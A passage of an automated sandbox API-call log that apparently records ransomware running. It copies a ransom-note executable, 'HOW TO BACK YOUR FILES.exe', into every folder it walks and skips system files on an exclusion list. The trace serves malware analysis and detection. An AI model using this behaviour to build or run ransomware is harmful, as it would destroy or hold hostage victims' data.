lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.674] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c870f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.675] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.675] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.675] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.675] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c870f00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.675] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.675] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.675] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.675] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.675] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c870f00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.675] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.675] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c870f00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c870f00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0089.675] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.675] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7af0 [0089.675] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS" [0089.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed798 | out: hHeap=0x2b0000) returned 1 [0089.675] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0089.675] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS") returned 39 [0089.675] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS" [0089.675] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.675] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.676] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.676] GetLastError () returned 0x0 [0089.676] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.676] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.676] CloseHandle (hObject=0x120) returned 1 [0089.676] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.676] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.676] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c897060, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c897060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.676] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.676] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.676] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.676] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c897060, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c897060, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.676] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.676] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.676] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.676] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.676] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c897060, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c897060, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.676] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.676] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c8bd1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 1 [0089.676] lstrcmpiW (lpString1="MachineKeys", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.677] lstrcmpiW (lpString1="MachineKeys", lpString2="aoldtz.exe") returned 1 [0089.677] lstrcmpiW (lpString1="MachineKeys", lpString2=".") returned 1 [0089.677] lstrcmpiW (lpString1="MachineKeys", lpString2="..") returned 1 [0089.677] lstrcmpiW (lpString1="MachineKeys", lpString2="windows") returned -1 [0089.677] lstrcmpiW (lpString1="MachineKeys", lpString2="bootmgr") returned 1 [0089.677] lstrcmpiW (lpString1="MachineKeys", lpString2="temp") returned -1 [0089.677] lstrcmpiW (lpString1="MachineKeys", lpString2="pagefile.sys") returned -1 [0089.677] lstrcmpiW (lpString1="MachineKeys", lpString2="boot") returned 1 [0089.677] lstrcmpiW (lpString1="MachineKeys", lpString2="ids.txt") returned 1 [0089.677] lstrcmpiW (lpString1="MachineKeys", lpString2="ntuser.dat") returned -1 [0089.677] lstrcmpiW (lpString1="MachineKeys", lpString2="perflogs") returned -1 [0089.677] lstrcmpiW (lpString1="MachineKeys", lpString2="MSBuild") returned -1 [0089.677] lstrlenW (lpString="MachineKeys") returned 11 [0089.677] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\*") returned 41 [0089.677] lstrcpyW (in: lpString1=0x2cce450, lpString2="MachineKeys" | out: lpString1="MachineKeys") returned="MachineKeys" [0089.677] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ae8 [0089.677] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x68) returned 0x2e4710 [0089.677] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7af0 | out: ListHead=0x2e7710, ListEntry=0x2e7af0) returned 0x2e7ad0 [0089.677] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c8bd1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MachineKeys", cAlternateFileName="MACHIN~1")) returned 0 [0089.677] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.677] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7af0 [0089.677] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys" [0089.677] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0089.677] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0089.677] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys") returned 51 [0089.677] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys" [0089.677] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.677] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\crypto\\dss\\machinekeys\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.678] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.678] GetLastError () returned 0x0 [0089.678] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.678] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.678] CloseHandle (hObject=0x120) returned 1 [0089.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.678] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.678] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c8bd1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.679] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.679] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.679] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.679] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c8bd1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.679] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.679] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.679] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.679] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.679] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c8bd1c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.679] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.679] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c8bd1c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0089.679] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.679] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ad0 [0089.679] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Assistance", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Assistance") returned="C:\\Users\\All Users\\Microsoft\\Assistance" [0089.679] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed8f8 | out: hHeap=0x2b0000) returned 1 [0089.679] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0089.679] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Assistance") returned 39 [0089.679] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Assistance" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Assistance") returned="C:\\Users\\All Users\\Microsoft\\Assistance" [0089.679] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.679] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\assistance\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.680] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.680] GetLastError () returned 0x0 [0089.680] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.680] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.680] CloseHandle (hObject=0x120) returned 1 [0089.680] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.680] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.680] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c8bd1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.680] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.680] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.680] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.680] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c8bd1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.680] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.680] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.680] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.680] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.680] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c8bd1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Client", cAlternateFileName="")) returned 1 [0089.681] lstrcmpiW (lpString1="Client", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.681] lstrcmpiW (lpString1="Client", lpString2="aoldtz.exe") returned 1 [0089.681] lstrcmpiW (lpString1="Client", lpString2=".") returned 1 [0089.681] lstrcmpiW (lpString1="Client", lpString2="..") returned 1 [0089.681] lstrcmpiW (lpString1="Client", lpString2="windows") returned -1 [0089.681] lstrcmpiW (lpString1="Client", lpString2="bootmgr") returned 1 [0089.681] lstrcmpiW (lpString1="Client", lpString2="temp") returned -1 [0089.681] lstrcmpiW (lpString1="Client", lpString2="pagefile.sys") returned -1 [0089.681] lstrcmpiW (lpString1="Client", lpString2="boot") returned 1 [0089.681] lstrcmpiW (lpString1="Client", lpString2="ids.txt") returned -1 [0089.681] lstrcmpiW (lpString1="Client", lpString2="ntuser.dat") returned -1 [0089.681] lstrcmpiW (lpString1="Client", lpString2="perflogs") returned -1 [0089.681] lstrcmpiW (lpString1="Client", lpString2="MSBuild") returned -1 [0089.681] lstrlenW (lpString="Client") returned 6 [0089.681] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Assistance\\*") returned 41 [0089.681] lstrcpyW (in: lpString1=0x2cce450, lpString2="Client" | out: lpString1="Client") returned="Client" [0089.681] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0089.681] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5e) returned 0x2f1fc8 [0089.681] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0089.681] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c8bd1c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.681] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.681] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c8bd1c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0089.681] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.681] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ad0 [0089.681] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Assistance\\Client", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Assistance\\Client") returned="C:\\Users\\All Users\\Microsoft\\Assistance\\Client" [0089.681] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1fc8 | out: hHeap=0x2b0000) returned 1 [0089.681] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0089.681] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Assistance\\Client") returned 46 [0089.681] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Assistance\\Client" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Assistance\\Client") returned="C:\\Users\\All Users\\Microsoft\\Assistance\\Client" [0089.681] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.681] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.682] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.682] GetLastError () returned 0x0 [0089.682] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.682] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.682] CloseHandle (hObject=0x120) returned 1 [0089.682] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.682] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.682] FindFirstFileW 